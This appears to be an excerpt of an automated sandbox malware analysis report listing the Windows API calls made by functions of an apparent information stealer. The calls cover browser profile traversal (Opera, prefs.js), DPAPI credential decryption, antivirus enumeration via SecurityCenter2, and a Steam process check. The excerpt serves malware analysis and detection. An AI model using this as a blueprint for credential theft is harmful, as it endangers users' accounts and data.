                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: Sleep.KERNEL32(000003E8,?,?), ref: 00416F40
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                            • String ID: JyA$\*.*
                                                                                                                                                                                                                            • API String ID: 1475085387-813135727
                                                                                                                                                                                                                            • Opcode ID: f258c4cfcc6ffa8f46453eb5638c328eb33da40b3dae3fe0602e1876ac3a8531
                                                                                                                                                                                                                            • Instruction ID: 533864eee019f00bdfe02d8649da9cc59868becad79d5191aa10b83f690668f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f258c4cfcc6ffa8f46453eb5638c328eb33da40b3dae3fe0602e1876ac3a8531
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F32DC71A001299BCF21FB25DD4A7CD7375AF04308F5151EAA548771A2CBB86FC98F89
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00411973
                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000030,00413FA7,?,AV: ,004368CC,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 00411982
                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411993
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119AD
                                                                                                                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004119E3
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00411A32
                                                                                                                                                                                                                              • Part of subcall function 00411D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A55,?), ref: 00411D1F
                                                                                                                                                                                                                              • Part of subcall function 00411D17: CharToOemW.USER32(?,00000000), ref: 00411D2B
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411A60
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                            • API String ID: 4288110179-315474579
                                                                                                                                                                                                                            • Opcode ID: 7f379c790eb099f24fc055ea34a0325628612ab894480d039f292940774d93bd
                                                                                                                                                                                                                            • Instruction ID: 3fda5078456e7a0d609a00957094a3acbddb435200cc30907b6e8efe348fab49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f379c790eb099f24fc055ea34a0325628612ab894480d039f292940774d93bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2315471A40209BBCB20DB91DC49EEFBF7DEFC9B10F20425EF211A61A0C6795941CB68
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004154AA
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004154C1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A88), ref: 004154E2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A8C), ref: 004154FC
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0041554D
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415560
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415574
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415587
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00436A90), ref: 00415599
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 004155AD
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00415663
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00415677
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                                            • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                            • Opcode ID: aad5053ca9173e086b43a7c8860dd625d7459b2022320881cc90702c44b34ae8
                                                                                                                                                                                                                            • Instruction ID: cfa0aec6b352dae58690e102aaeb3022d81cb88ca45f59a79432ddb89cc4a843
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aad5053ca9173e086b43a7c8860dd625d7459b2022320881cc90702c44b34ae8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57513FB190021D9BCF64DF60DC89AC9B7BDAB49305F0045EAE609E3250EB359BC5CF69
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC40,?,?), ref: 0040BF9A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437468), ref: 0040BFBA
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043746C), ref: 0040BFD4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera,0043683B,0043683A,00436837,00436836,00436833,00436832,0043682F), ref: 0040C060
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C06E
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C07C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                            • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                            • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00415202
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00415225
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 0041522E
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0041524E
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00415269
                                                                                                                                                                                                                              • Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414D5C
                                                                                                                                                                                                                              • Part of subcall function 00414D08: FindFirstFileA.KERNEL32(?,?), ref: 00414D73
                                                                                                                                                                                                                              • Part of subcall function 00414D08: _memset.LIBCMT ref: 00414D8F
                                                                                                                                                                                                                              • Part of subcall function 00414D08: _memset.LIBCMT ref: 00414DA0
                                                                                                                                                                                                                              • Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,00436A00), ref: 00414DC1
                                                                                                                                                                                                                              • Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,00436A04), ref: 00414DDB
                                                                                                                                                                                                                              • Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414E02
                                                                                                                                                                                                                              • Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414E16
                                                                                                                                                                                                                              • Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414E3F
                                                                                                                                                                                                                              • Part of subcall function 00414D08: _memset.LIBCMT ref: 00414E68
                                                                                                                                                                                                                              • Part of subcall function 00414D08: lstrcatA.KERNEL32(?,?), ref: 00414E7D
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041528A
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00415304
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                            • API String ID: 441469471-147700698
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,00437568,00436887,?,?,?), ref: 0040D61C
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043756C), ref: 0040D63D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437570), ref: 0040D657
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,prefs.js,00437574,?,0043688F), ref: 0040D6E3
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7BD
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040D888
                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040D92B
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040D93F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                            • String ID: prefs.js
                                                                                                                                                                                                                            • API String ID: 893096357-3783873740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043741C,00436822,?,?,?), ref: 0040B62C
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437420), ref: 0040B64D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437424), ref: 0040B667
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437428,?,00436823), ref: 0040B6F4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040B755
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 0040ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC5F
                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040B8C0
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040B8D4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3801961486-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00412487
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124A9
                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004124B9
                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004124CB
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 004124DD
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004124F6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID: steam.exe
                                                                                                                                                                                                                            • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,0043670A,?,?), ref: 00410DE1
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410DEF
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410DFD
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E2C
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00410ED4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0041255E
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E73,.exe,00436CD4,00436CD0,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC), ref: 0041257D
                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 0041258D
                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0041259F
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004125B1
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004125C5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1799959500-0
                                                                                                                                                                                                                            • Opcode ID: df2519ba6d108fdc8b71c082039c9bc3bb26964c19a844e6744d04e068c13488
                                                                                                                                                                                                                            • Instruction ID: dfa50e9b2d92f41fe19a6e116423a8dfd4d95ce18993e0e6c6816f44e1c7b9ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df2519ba6d108fdc8b71c082039c9bc3bb26964c19a844e6744d04e068c13488
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8018671500224ABDB249B60DD44FEE7BBD9F04301F8400E6E40DD2291D7788F949B25
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080D8
                                                                                                                                                                                                                            • LocalFree.KERNEL32(0040CB6A,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                            • String ID: DPAPI
                                                                                                                                                                                                                            • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                            • Opcode ID: 71843aaf0a7933e65d977fae079d0a2f5d5a43d1982792f3285d4ffad2c25dc6
                                                                                                                                                                                                                            • Instruction ID: 5332633284173789c767692548fdca268c5249f85a7424e749217d90e47653fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71843aaf0a7933e65d977fae079d0a2f5d5a43d1982792f3285d4ffad2c25dc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC01EC75A01218EFCB04DFA8D88489EBBB9FF48714F158466E906E7341D7719F05CB90
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043670F,?,?), ref: 004114A9
                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004114B9
                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411517
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411522
                                                                                                                                                                                                                            Memory Dump Source
